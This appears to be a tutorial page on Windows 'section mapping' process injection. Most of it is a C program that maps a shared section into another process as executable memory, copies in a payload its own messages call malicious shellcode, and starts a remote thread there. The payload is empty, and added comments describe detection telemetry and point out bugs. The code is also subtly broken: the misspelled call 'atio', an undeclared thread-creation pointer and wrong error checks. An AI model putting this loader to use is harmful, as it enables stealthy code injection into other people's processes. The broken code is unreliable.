What is the theory behind Section Mapping?

Untitled

Section Mapping Steps

Untitled

Now let’s write the section mapping code

#include <stdio.h>
#include <Windows.h>
#include <winternl.h>
#include <ntifs.h>

// Bytes that main() copies into the locally mapped view of the shared section.
// The array is empty on this page, so sizeof(payload) is 1 (only the string
// terminator), and the memcpy in main copies a single zero byte.
unsigned char payload[] =
"";

// Function-pointer type for the ntdll export NtCreateSection; main() binds it
// at runtime through GetProcAddress instead of linking against ntdll.
// NOTE(review): identifiers starting with '_' followed by an uppercase letter
// are reserved for the implementation in C; a project prefix would be safer.
typedef NTSTATUS(NTAPI* _NtCreateSection)(
	PHANDLE SectionHandle,
	ACCESS_MASK DesiredAccess,
	POBJECT_ATTRIBUTES ObjectAttributes,
	PLARGE_INTEGER MaximumSize,
	ULONG SectionPageProtection,
	ULONG AllocationAttributes,
	HANDLE FileHandle        // NULL in main(): the section is not file-backed
	);

// Function-pointer type for the ntdll export NtMapViewOfSection. main() calls it
// twice: once with GetCurrentProcess() and once with the handle to the target
// process; the ProcessHandle argument is what distinguishes the two.
typedef NTSTATUS(NTAPI* _NtMapViewOfSection)(
	HANDLE SectionHandle,
	HANDLE ProcessHandle,
	PVOID* BaseAddress,       // in/out: receives the address the view was placed at
	ULONG_PTR ZeroBits,
	SIZE_T CommitSize,
	PLARGE_INTEGER SectionOffset,
	PSIZE_T ViewSize,         // in/out: main() passes &size for both calls
	DWORD InheritDisposition, // main() passes ViewUnmap
	ULONG AllocationType,
	ULONG Win32Protect        // PAGE_READWRITE locally, PAGE_EXECUTE_READ remotely
	);

// Function-pointer type for the ntdll export NtCreateThreadEx, used by main()
// to start a thread in the target process. Only a subset of the parameters is
// meaningful for this program; main() passes NULL for the attribute list.
typedef NTSTATUS(NTAPI* _NtCreateThreadEx)(
	PHANDLE ThreadHandle,
	ACCESS_MASK DesiredAccess,
	POBJECT_ATTRIBUTES ObjectAttributes,
	HANDLE ProcessHandle,     // the process the thread is created in
	PVOID StartRoutine,       // main() passes the remote view address
	PVOID Argument,
	ULONG CreateFlags,
	ULONG_PTR ZeroBits,
	SIZE_T StackSize,
	SIZE_T MaximumStackSize,
	PPS_ATTRIBUTE_LIST AttributeList
	);

// Local mirror of the native PS_ATTRIBUTE entry that NtCreateThreadEx takes in
// its attribute list. main() passes a NULL list, so no entry is ever built here;
// the definition only exists so the typedef above has a complete parameter type.
typedef struct _PS_ATTRIBUTE {
	ULONG Attribute;
	SIZE_T Size;
	union {
		ULONG_PTR Value;
		PVOID ValuePtr;
	} u1;
	PSIZE_T ReturnLength;
} PS_ATTRIBUTE, * PPS_ATTRIBUTE;

// Local mirror of the native PS_ATTRIBUTE_LIST header. Attributes[1] is the
// classic one-element trailing array; C99 would express this as a flexible
// array member (Attributes[]). Unused at runtime: main() passes NULL.
typedef struct _PS_ATTRIBUTE_LIST {
	SIZE_T TotalLength;
	PS_ATTRIBUTE Attributes[1];
} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;

// InheritDisposition values for NtMapViewOfSection. Both map calls in main()
// use ViewUnmap; the enum is passed where the typedef declares a DWORD.
typedef enum _SECTION_INHERIT {
	ViewShare = 1,
	ViewUnmap = 2
} SECTION_INHERIT;

// Entry point: takes a single PID argument, creates a pagefile-backed section,
// maps it read/write locally and execute/read in the target, copies `payload`
// into the local view and starts a thread in the target at the remote view.
// From a detection standpoint the observable events are: the broad-rights
// OpenProcess on another process, a NtMapViewOfSection whose ProcessHandle is
// not the caller with executable protection, and a thread created in a foreign
// process at an address that is not backed by an image. Each of these is
// visible to kernel object/thread notification callbacks and is commonly used
// as a telemetry point for this family of technique.
int main(int argc, char** argv)
{
	// Target process id. NOTE(review): NULL is a pointer constant being used
	// to initialise an integer type; 0 is the matching value.
	DWORD PID = NULL;
	if (argc > 2 || argc < 2)
	{
		printf("[!] Usage: example.exe PID");
		return EXIT_FAILURE;
	}
	else
	{
		// argv[1] is taken as the PID as-is; there is no validation that it
		// is numeric or in range before it reaches OpenProcess below.
		PID = atio(argv[1]);
	}
	// The three Nt* exports are resolved from ntdll at runtime rather than
	// linked. Dynamic resolution of these particular names by string is itself
	// a frequent static/heuristic indicator.
	_NtCreateSection pNtCreateSection = (_NtCreateSection)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtCreateSection");
	// NOTE(review): GetProcAddress reports failure with NULL, not
	// INVALID_HANDLE_VALUE, so this comparison never detects a missing export.
	if (pNtCreateSection == INVALID_HANDLE_VALUE)
	{
		printf("[-] Unable To Locate NtCraeteSection API\\n");
		return EXIT_FAILURE;
	}
	else
	{
		printf("[+] Successfully Got Handle To The NtCreateSection API: %p\\n", pNtCreateSection);
	}
	_NtMapViewOfSection pNtMapViewOfSection = (_NtMapViewOfSection)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtMapViewOfSection");
	// NOTE(review): re-tests pNtCreateSection instead of the pointer just
	// resolved (same sentinel issue as above).
	if (pNtCreateSection == INVALID_HANDLE_VALUE)
	{
		printf("[-] Unable To Locate NtMapViewOfSection API\\n");
		return EXIT_FAILURE;
	}
	else
	{
		printf("[+] Successfully Got Handle To The NtMapViewOfSection API: %p\\n", pNtMapViewOfSection);
	}
	_NtCreateThreadEx pNtCreateThreadEx = (_NtCreateThreadEx)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtCreateThreadEx");
	// NOTE(review): again tests pNtCreateSection rather than pNtCreateThreadEx.
	if (pNtCreateSection == INVALID_HANDLE_VALUE)
	{
		printf("[-] Unable To Locate NtCreateThreadEx API\\n");
		return EXIT_FAILURE;
	}
	else
	{
		printf("[+] Successfully Got Handle To The NtCreateThreadEx API: %p\\n", pNtCreateThreadEx);
	}
	// NOTE(review): NTSTATUS is an integer type; NULL is a pointer constant.
	NTSTATUS status = NULL;
	HANDLE hSection = NULL;
	HANDLE hTargeProcess = NULL;
	HANDLE hThread = NULL;
	PVOID local_view_addr = NULL;   // RW view in this process
	PVOID remote_view_addr = NULL;  // RX view of the same section in the target
	SIZE_T size = 0x1000;           // one page; also reused as the in/out ViewSize
	// Aggregate init fills the first member of the LARGE_INTEGER union from a
	// SIZE_T; on 64-bit this narrows, harmless for 0x1000 but worth knowing.
	LARGE_INTEGER section_size = { size };
	// Full-access handle to another process. Kernel object callbacks see this
	// request and its requested rights, which is why broad access masks on
	// foreign processes are a typical first detection point.
	hTargeProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
	// NOTE(review): OpenProcess returns NULL on failure, so this check does
	// not catch a failed open; the NULL handle then flows into the map call.
	if (hTargeProcess == INVALID_HANDLE_VALUE)
	{
		printf("[-] Faild To Get Handle To Target Process: %p\\n", hTargeProcess);
		return EXIT_FAILURE;
	}
	else
	{
		printf("[+] Successfully Got Handle To Target Process: %p\\n", hTargeProcess);
	}
	// FileHandle is NULL, so the section is backed by the pagefile rather than
	// a file; its maximum protection is PAGE_EXECUTE_READ and it is committed
	// up front (SEC_COMMIT).
	status = pNtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL, &section_size, PAGE_EXECUTE_READ, SEC_COMMIT, NULL);
	if (!NT_SUCCESS(status))
	{
		printf("[-] Failed To Create Section. Err 0x%x \\n", status);
		return EXIT_FAILURE;
	}
	else
	{
		printf("[+] Successfully Created Section: 0x%x \\n", status);
	}
	// Local view, writable. Because both views share the same pages, writing
	// here is how bytes reach the target without any cross-process write API;
	// defenders therefore key on the mapping itself rather than on write calls.
	status = pNtMapViewOfSection(hSection, GetCurrentProcess(), &local_view_addr, NULL, NULL, NULL, &size, ViewUnmap, NULL, PAGE_READWRITE);
	if (!NT_SUCCESS(status))
	{
		printf("[-] Failed To Map Section. Err 0x%x \\n", status);
		return EXIT_FAILURE;
	}
	else
	{
		printf("[+] Successfully Mapped Section To Local Process: 0x%x \\n", status);
	}
	// Remote view, executable. A NtMapViewOfSection whose ProcessHandle is not
	// the caller and whose protection includes execute is the central
	// observable of this technique. `size` was updated by the previous call and
	// is reused here as the requested view size.
	status = pNtMapViewOfSection(hSection, hTargeProcess, &remote_view_addr, NULL, NULL, NULL, &size, ViewUnmap, NULL, PAGE_EXECUTE_READ);
	if (!NT_SUCCESS(status))
	{
		printf("[-] Failed To Map Section. Err 0x%x \\n", status);
		return EXIT_FAILURE;
	}
	else
	{
		printf("[+] Successfully Mapped Section To Targe Process: 0x%x \\n", status);
	}
	// memcpy returns its destination pointer, so the else branch is reached
	// only when local_view_addr is NULL; it does not report copy errors. The
	// copy length is sizeof(payload), including the terminator (1 byte on this
	// page since the array is empty).
	if (memcpy(local_view_addr, payload, sizeof(payload)))
	{
		printf("[+] Successfully Wrote The Malicious Shellcode To The Mapped Section\\n");
	}
	else 
	{
		printf("[-] Failed To Write The Malicious Shellcode To The Mapped Section\\n");
		return EXIT_FAILURE;
	}
	// Thread in the target whose start address is the remote view, i.e. memory
	// not backed by any loaded image. Kernel thread-creation notifications
	// expose the creating process, the owning process and the start address,
	// which is the standard detection for this step.
	status = pNtCraeteThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, hTargeProcess, (LPTHREAD_START_ROUTINE)remote_view_addr, NULL, FALSE, 0, 0, 0, NULL);
	if (!NT_SUCCESS(status))
	{
		printf("[-] Failed To Craete Thread. Err 0x%x \\n", status);
		return EXIT_FAILURE;
	}
	else
	{
		printf("[+] Successfully Created Thread: 0x%x \\n", status);
	}
	// NOTE(review): hSection, hTargeProcess and hThread are never closed and
	// the local view is never unmapped; the process exits with them open.
	// Falling off the end of main yields 0 under C99 and later.
}